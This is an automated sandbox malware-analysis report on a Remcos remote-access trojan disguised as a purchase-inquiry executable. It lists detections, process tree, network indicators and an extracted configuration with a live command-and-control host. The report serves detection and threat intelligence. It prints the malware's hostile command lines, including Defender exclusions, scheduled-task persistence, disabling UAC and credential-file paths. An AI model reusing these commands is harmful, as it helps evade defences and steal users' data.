Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Inquiry_002.exe

Overview

General Information

Sample name:Purchase Inquiry_002.exe
Analysis ID:1560114
MD5:c016b06a4942455df9ce8a58b72bcc90
SHA1:dba52afe33451c444fd5cf3c6aca9d2ced768d2c
SHA256:e115d3bd2903d9d663a7a69edd08b0ba5f2528c831d17530bbf621648b44894c
Tags:exeuser-TeamDreier
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Inquiry_002.exe (PID: 7180 cmdline: "C:\Users\user\Desktop\Purchase Inquiry_002.exe" MD5: C016B06A4942455DF9CE8A58B72BCC90)
    • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1708 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5956 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Purchase Inquiry_002.exe (PID: 8184 cmdline: "C:\Users\user\Desktop\Purchase Inquiry_002.exe" MD5: C016B06A4942455DF9CE8A58B72BCC90)
  • xASiLfzXONGIW.exe (PID: 1412 cmdline: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe MD5: C016B06A4942455DF9CE8A58B72BCC90)
    • schtasks.exe (PID: 6116 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xASiLfzXONGIW.exe (PID: 6124 cmdline: "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe" MD5: C016B06A4942455DF9CE8A58B72BCC90)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["cee.work.gd:2531:1"], "Assigned name": "ce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-1IH5DX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x691e0:$a1: Remcos restarted by watchdog!
        • 0x69738:$a3: %02i:%02i:%02i:%03i
        • 0x69abd:$a4: * Remcos v
        0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6320c:$str_b2: Executing file:
        • 0x64328:$str_b3: GetDirectListeningPort
        • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x63e30:$str_b7: \update.vbs
        • 0x63234:$str_b9: Downloaded file:
        • 0x63220:$str_b10: Downloading file:
        • 0x632c4:$str_b12: Failed to upload file:
        • 0x642f0:$str_b13: StartForward
        • 0x64310:$str_b14: StopForward
        • 0x63dd8:$str_b15: fso.DeleteFile "
        • 0x63d6c:$str_b16: On Error Resume Next
        • 0x63e08:$str_b17: fso.DeleteFolder "
        • 0x632b4:$str_b18: Uploaded file:
        • 0x63274:$str_b19: Unable to delete:
        • 0x63da0:$str_b20: while fso.FileExists("
        • 0x63749:$str_c0: [Firefox StoredLogins not found]
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        14.2.xASiLfzXONGIW.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          14.2.xASiLfzXONGIW.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          14.2.xASiLfzXONGIW.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          14.2.xASiLfzXONGIW.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          0.2.Purchase Inquiry_002.exe.43ad470.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 17 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ProcessId: 1472, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ProcessId: 1472, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe, ParentImage: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe, ParentProcessId: 1412, ParentProcessName: xASiLfzXONGIW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp", ProcessId: 6116, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", ProcessId: 5956, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ProcessId: 1472, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Inquiry_002.exe", ParentImage: C:\Users\user\Desktop\Purchase Inquiry_002.exe, ParentProcessId: 7180, ParentProcessName: Purchase Inquiry_002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp", ProcessId: 5956, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T12:22:03.765320+010020365941Malware Command and Control Activity Detected192.168.2.1049749154.216.19.1412531TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T12:22:07.045321+010028033043Unknown Traffic192.168.2.1049757178.237.33.5080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: cee.work.gdAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["cee.work.gd:2531:1"], "Assigned name": "ce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-1IH5DX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeReversingLabs: Detection: 73%
            Multi AV Scanner detection for submitted file
            Source: Purchase Inquiry_002.exeReversingLabs: Detection: 73%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Purchase Inquiry_002.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_004315EC
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c06cbc74-2
            Source: Purchase Inquiry_002.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Purchase Inquiry_002.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: zJGj.pdb source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr
            Source: Binary string: zJGj.pdbSHA2567 source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040838E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004087A0
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00407848
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004068CD FindFirstFileW,FindNextFileW,14_2_004068CD
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0044BA59 FindFirstFileExA,14_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00406D28
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 4x nop then jmp 06D95078h0_2_06D94801
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 4x nop then jmp 074242E0h10_2_07423A69

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49749 -> 154.216.19.141:2531
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: cee.work.gd
            Source: global trafficTCP traffic: 192.168.2.10:49749 -> 154.216.19.141:2531
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49757 -> 178.237.33.50:80
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_0041936B
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: cee.work.gd
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, xASiLfzXONGIW.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752456132.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp7
            Source: Purchase Inquiry_002.exe, 00000009.00000002.3752431492.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1341190098.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, xASiLfzXONGIW.exe, 0000000A.00000002.1380724904.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.drString found in binary or memory: http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
